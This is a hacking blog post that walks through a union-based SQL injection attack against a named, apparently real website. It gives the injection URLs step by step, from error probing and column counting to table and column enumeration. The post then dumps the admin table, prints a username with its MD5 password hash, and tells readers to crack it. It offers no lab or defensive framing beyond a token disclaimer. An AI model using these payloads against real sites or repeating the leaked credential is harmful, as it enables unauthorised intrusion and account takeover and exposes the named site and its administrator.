SQL Injection

 

SQL Injection 

 

This Article Is About how to Hack a website with SQL Injection. I and oceanofanythingg.blogspot.com Takes No responsibility for it’s misuse.ok.

we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end
http://www.allaboutcar.net/articles.php?topic=3'\
it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

do that untill u get a error

It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

that mean it only has 5 columns ..  because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5

5.0.67

ok now ..

let get the table names.. to do that u need to use this commands

group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables

http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins

,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,

infopages,

jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,

date,id,title,

alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,

mail,title,

text,ip,

id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .

So Friends that all for this tutorial
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253

Post a Comment

0 Comments